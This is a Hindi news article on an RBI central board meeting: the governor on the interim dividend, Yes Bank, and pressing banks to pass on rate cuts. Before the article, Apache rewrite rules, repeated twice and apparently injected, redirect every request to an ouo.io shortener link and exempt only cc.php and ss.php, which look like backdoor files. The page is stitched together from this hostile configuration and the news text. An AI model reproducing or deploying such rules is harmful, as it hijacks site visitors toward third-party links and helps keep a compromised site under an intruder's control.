
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 510
Previous Nextआज आरबीआई सेंट्रल बोर्ड की बैठक हुई। बजट के बाद हुए इस बैठक में आरबीआई गवर्नर के साथ वित्त मंत्री अरुण जेटली भी शामिल हुए। इस बैठक में अंतरिम डिविडेंड पर भी चर्चा हुई। बैठक के बाद आरबीआई गवर्नर शक्तिकांता दास ने कहा कि डिविडेंड पर फैसला रिजर्व बैंक करेगा। आरबीआई की वित्तीय हालत के हिसाब से सरकार वित्त वर्ष 2018-2019 में 28 हजार करोड़ रुपये के डिविडेंड की उम्मीद कर रही है। पिछले वित्त वर्ष में आरबीआई ने केंद्र सरकार के 10000 करोड़ का डिविडेंड दिया था।
कोटक बैंक पर बात करते हुए आरबीआई गवर्नर शक्तिकांता दास ने कोटक बैंक पर फिलहाल टिप्पणी से इनकार किया, लेकिन यस बैंक मामले पर उनका कहना है कि यस बैंक का मामला रेगुलेटर और बैंक के बीच का है। आरबीआई लगातार वित्तीय संस्थानों के संपर्क में है।
इसके अलावा शक्तिकांता दास ने बैंकों पर नाराजगी जाहिर की। रिजर्व बैंक ने साफ कहा कि दरों में कटौती का फायदा आम आदमी को सस्ते कर्ज के तौर पर मिलना चाहिए। इस मामले पर शक्तिकांता दास गुरुवार को बैंकर्स के साथ मुलाकात भी करेंगे।
उन्होंने यह भी कहा कि वह 21 फरवरी को बैंक प्रमुखों के साथ बैठक करेंगे। इस बैठक में कस्टमर्स को ब्याज दरों में कटौती का पूरा फायदा देने पर चर्चा की जाएगी। यह भी कहा गया कि आरबीआई सभी वित्तीय संस्थाओं पर लगातार नजर रखे हुए है। प्राइवेट और सरकारी संस्थाओं को लेकर रेग्युलेटर का कोई भेदभाव नहीं है।